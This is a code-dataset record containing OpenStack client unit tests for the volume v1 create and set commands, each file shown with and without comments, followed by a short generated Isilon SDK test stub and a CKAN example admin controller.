] | null | null | null | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
] | null | null | null | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
] | null | null | null | # Copyright 2013 Nebula Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from openstackclient.tests import fakes
from openstackclient.tests.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.volume.v1 import fakes as volume_fakes
from openstackclient.volume.v1 import volume
class TestVolume(volume_fakes.TestVolumev1):
    """Base class for volume v1 command tests; wires up manager mocks."""
    def setUp(self):
        super(TestVolume, self).setUp()
        # Get a shortcut to the VolumeManager Mock
        self.volumes_mock = self.app.client_manager.volume.volumes
        self.volumes_mock.reset_mock()
        # Get a shortcut to the TenantManager Mock
        self.projects_mock = self.app.client_manager.identity.tenants
        self.projects_mock.reset_mock()
        # Get a shortcut to the UserManager Mock
        self.users_mock = self.app.client_manager.identity.users
        self.users_mock.reset_mock()
        # Get a shortcut to the ImageManager Mock
        self.images_mock = self.app.client_manager.image.images
        self.images_mock.reset_mock()
# TODO(dtroyer): The volume create tests are incomplete, only the minimal
# options and the options that require additional processing
# are implemented at this time.
class TestVolumeCreate(TestVolume):
    def setUp(self):
        """Stub volumes.create() to return a fake volume and build the cmd."""
        super(TestVolumeCreate, self).setUp()
        self.volumes_mock.create.return_value = fakes.FakeResource(
            None,
            copy.deepcopy(volume_fakes.VOLUME),
            loaded=True,
        )
        # Get the command object to test
        self.cmd = volume.CreateVolume(self.app, None)
def test_volume_create_min_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
'--description', volume_fakes.volume_description,
'--type', volume_fakes.volume_type,
'--availability-zone', volume_fakes.volume_zone,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('description', volume_fakes.volume_description),
('type', volume_fakes.volume_type),
('availability_zone', volume_fakes.volume_zone),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
volume_fakes.volume_description,
volume_fakes.volume_type,
None,
None,
volume_fakes.volume_zone,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_id(self):
# Return a project
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
# Return a user
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_id,
'--user', identity_fakes.user_id,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_id),
('user', identity_fakes.user_id),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_name(self):
# Return a project
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
# Return a user
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_name,
'--user', identity_fakes.user_name,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_name),
('user', identity_fakes.user_name),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_properties(self):
arglist = [
'--property', 'Alpha=a',
'--property', 'Beta=b',
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('property', {'Alpha': 'a', 'Beta': 'b'}),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
{'Alpha': 'a', 'Beta': 'b'},
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_id(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_id,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_id),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_name(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_name,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_name),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
class TestVolumeSet(TestVolume):
def setUp(self):
super(TestVolumeSet, self).setUp()
self.volumes_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.volumes_mock.update.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
# Get the command object to test
self.cmd = volume.SetVolume(self.app, None)
def test_volume_set_no_options(self):
arglist = [
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("No changes requested\n",
self.app.log.messages.get('error'))
def test_volume_set_name(self):
arglist = [
'--name', 'qwerty',
volume_fakes.volume_name,
]
verifylist = [
('name', 'qwerty'),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'display_name': 'qwerty',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_description(self):
arglist = [
'--description', 'new desc',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', 'new desc'),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'display_description': 'new desc',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_size(self):
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
size = 130
self.volumes_mock.extend.assert_called_with(
volume_fakes.volume_id,
size
)
def test_volume_set_size_smaller(self):
arglist = [
'--size', '100',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 100),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("New size must be greater than %s GB" %
volume_fakes.volume_size,
self.app.log.messages.get('error'))
def test_volume_set_size_not_available(self):
self.volumes_mock.get.return_value.status = 'error'
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("Volume is in %s state, it must be available before "
"size can be extended" % 'error',
self.app.log.messages.get('error'))
def test_volume_set_property(self):
arglist = [
'--property', 'myprop=myvalue',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', {'myprop': 'myvalue'}),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
metadata = {
'myprop': 'myvalue'
}
self.volumes_mock.set_metadata.assert_called_with(
volume_fakes.volume_id,
metadata
)
| 32.01831 | 78 | 0.5397 |
import copy
from openstackclient.tests import fakes
from openstackclient.tests.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.volume.v1 import fakes as volume_fakes
from openstackclient.volume.v1 import volume
class TestVolume(volume_fakes.TestVolumev1):
def setUp(self):
super(TestVolume, self).setUp()
self.volumes_mock = self.app.client_manager.volume.volumes
self.volumes_mock.reset_mock()
self.projects_mock = self.app.client_manager.identity.tenants
self.projects_mock.reset_mock()
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
self.images_mock = self.app.client_manager.image.images
self.images_mock.reset_mock()
class TestVolumeCreate(TestVolume):
def setUp(self):
super(TestVolumeCreate, self).setUp()
self.volumes_mock.create.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.cmd = volume.CreateVolume(self.app, None)
def test_volume_create_min_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
'--description', volume_fakes.volume_description,
'--type', volume_fakes.volume_type,
'--availability-zone', volume_fakes.volume_zone,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('description', volume_fakes.volume_description),
('type', volume_fakes.volume_type),
('availability_zone', volume_fakes.volume_zone),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
volume_fakes.volume_description,
volume_fakes.volume_type,
None,
None,
volume_fakes.volume_zone,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_id(self):
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_id,
'--user', identity_fakes.user_id,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_id),
('user', identity_fakes.user_id),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_name(self):
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_name,
'--user', identity_fakes.user_name,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_name),
('user', identity_fakes.user_name),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_properties(self):
arglist = [
'--property', 'Alpha=a',
'--property', 'Beta=b',
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('property', {'Alpha': 'a', 'Beta': 'b'}),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
{'Alpha': 'a', 'Beta': 'b'},
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_id(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_id,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_id),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_name(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_name,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_name),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
class TestVolumeSet(TestVolume):
def setUp(self):
super(TestVolumeSet, self).setUp()
self.volumes_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.volumes_mock.update.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.cmd = volume.SetVolume(self.app, None)
def test_volume_set_no_options(self):
arglist = [
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("No changes requested\n",
self.app.log.messages.get('error'))
def test_volume_set_name(self):
arglist = [
'--name', 'qwerty',
volume_fakes.volume_name,
]
verifylist = [
('name', 'qwerty'),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
kwargs = {
'display_name': 'qwerty',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_description(self):
arglist = [
'--description', 'new desc',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', 'new desc'),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
kwargs = {
'display_description': 'new desc',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_size(self):
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
size = 130
self.volumes_mock.extend.assert_called_with(
volume_fakes.volume_id,
size
)
def test_volume_set_size_smaller(self):
arglist = [
'--size', '100',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 100),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("New size must be greater than %s GB" %
volume_fakes.volume_size,
self.app.log.messages.get('error'))
def test_volume_set_size_not_available(self):
self.volumes_mock.get.return_value.status = 'error'
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("Volume is in %s state, it must be available before "
"size can be extended" % 'error',
self.app.log.messages.get('error'))
def test_volume_set_property(self):
arglist = [
'--property', 'myprop=myvalue',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', {'myprop': 'myvalue'}),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
metadata = {
'myprop': 'myvalue'
}
self.volumes_mock.set_metadata.assert_called_with(
volume_fakes.volume_id,
metadata
)
| true | true |
f732611a1a2ab486119fd62c51262868f3c65886 | 920 | py | Python | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_8_1_1/test/test_hdfs_racks_extended.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 6
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.hdfs_racks_extended import HdfsRacksExtended # noqa: E501
from isi_sdk_8_1_1.rest import ApiException
class TestHdfsRacksExtended(unittest.TestCase):
"""HdfsRacksExtended unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsRacksExtended(self):
"""Test HdfsRacksExtended"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_1_1.models.hdfs_racks_extended.HdfsRacksExtended() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.439024 | 92 | 0.71087 |
from __future__ import absolute_import
import unittest
import isi_sdk_8_1_1
from isi_sdk_8_1_1.models.hdfs_racks_extended import HdfsRacksExtended
from isi_sdk_8_1_1.rest import ApiException
class TestHdfsRacksExtended(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsRacksExtended(self):
s
if __name__ == '__main__':
unittest.main()
| true | true |
f73261dcada28847fe886f6d9f0b31bf935869e2 | 723 | py | Python | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 2 | 2015-07-17T19:09:52.000Z | 2017-08-30T20:23:44.000Z | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 12 | 2015-01-19T18:03:56.000Z | 2016-04-11T16:40:33.000Z | ckanext/example_iconfigurer/controller.py | florianm/ckan | 1cfd98d591ac70b4eb81048bcd227b6c1354b1bf | [
"Apache-2.0"
] | 3 | 2015-03-31T06:19:42.000Z | 2016-06-27T15:32:28.000Z | import ckan.lib.base as base
import ckan.lib.helpers as helpers
render = base.render
class MyExtController(base.BaseController):
def config_one(self):
'''Render the config template with the first custom title.'''
return render('admin/myext_config.html',
extra_vars={'title': 'My First Config Page'})
def config_two(self):
'''Render the config template with the second custom title.'''
return render('admin/myext_config.html',
extra_vars={'title': 'My Second Config Page'})
def build_extra_admin_nav(self):
'''Return results of helpers.build_extra_admin_nav for testing.'''
return helpers.build_extra_admin_nav()
| 31.434783 | 74 | 0.662517 | import ckan.lib.base as base
import ckan.lib.helpers as helpers
render = base.render
class MyExtController(base.BaseController):
def config_one(self):
return render('admin/myext_config.html',
extra_vars={'title': 'My First Config Page'})
def config_two(self):
return render('admin/myext_config.html',
extra_vars={'title': 'My Second Config Page'})
def build_extra_admin_nav(self):
return helpers.build_extra_admin_nav()
| true | true |
